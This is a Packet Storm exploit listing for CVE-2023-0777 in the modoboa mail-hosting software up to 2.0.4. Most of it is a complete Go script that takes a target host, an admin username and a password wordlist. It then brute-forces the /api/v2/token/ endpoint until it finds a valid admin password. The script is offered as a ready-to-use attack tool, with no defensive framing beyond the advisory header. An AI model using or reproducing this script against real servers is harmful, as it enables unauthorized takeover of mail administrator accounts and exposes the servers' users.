exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

modoboa 2.0.4 Admin Takeover

modoboa 2.0.4 Admin Takeover
Posted Apr 6, 2023
Authored by 7h3h4ckv157

modoboa version 2.0.4 suffers from an administrative takeover vulnerability.

tags | exploit
advisories | CVE-2023-0777
SHA-256 | 3b42d60a7cd6213840e961f963f20c77472420c0b38e4932c246857412edc820

modoboa 2.0.4 Admin Takeover

Change Mirror Download
/* # Exploit Title: modoboa  2.0.4 - Admin TakeOver 
# Description: Authentication Bypass by Primary Weakness
# Date: 02/10/2023
# Software Link: https://github.com/modoboa/modoboa
# Version: modoboa/modoboa prior to 2.0.4
# Tested on: Arch Linux
# Exploit Author: 7h3h4ckv157
# CVE: CVE-2023-0777


*/

package main

import (
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"time"
)

func main() {
fmt.Println("\n\t*** ADMIN TAKEOVER ***\n")
host := getInput("Enter the target host: ")
username := getInput("Enter the Admin's Name: ")
passwordFile := getInput("Provide the path for Password-Wordlist: ")


passwords, err := readLines(passwordFile)
if err != nil {
fmt.Println("Error reading password file:", err)
os.Exit(1)
}

for _, password := range passwords {
data := fmt.Sprintf("-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552--\r\n\r\n", username, password)

headers := map[string]string{
"Host": host,
"User-Agent": "Anonymous",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------25524418606542250161357131552",
}

resp, err := postRequest(fmt.Sprintf("https://%s/api/v2/token/", host), headers, data)
if err != nil {
fmt.Println("Error sending request:", err)
os.Exit(1)
}

if resp.StatusCode == 200 {
fmt.Printf("\n\tValid password Found: %s\n", password)
break
} else {
fmt.Printf("Invalid password: %s\n", password)
}

// Delay the next request to limit the requests per second
delay := time.Duration(1000000000/50) * time.Nanosecond
time.Sleep(delay)
}
}

// Read the lines from a file and return them as a slice of strings
func readLines(filename string) ([]string, error) {
content, err := ioutil.ReadFile(filename)
if err != nil {
return nil, err
}
return strings.Split(string(content), "\n"), nil
}

// Send a POST request with the given headers and data
func postRequest(url string, headers map[string]string, data string) (*http.Response, error) {
req, err := http.NewRequest("POST", url, strings.NewReader(data))
if err != nil {
return nil, err
}
for key, value := range headers {
req.Header.Set(key, value)
}
client := &http.Client{}
resp, err := client.Do(req)
if err != nil {
return nil, err
}
return resp, nil
}

// Get user input and return the trimmed value
func getInput(prompt string) string {
fmt.Print(prompt)
var input string
fmt.Scanln(&input)
return strings.TrimSpace(input)
}


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close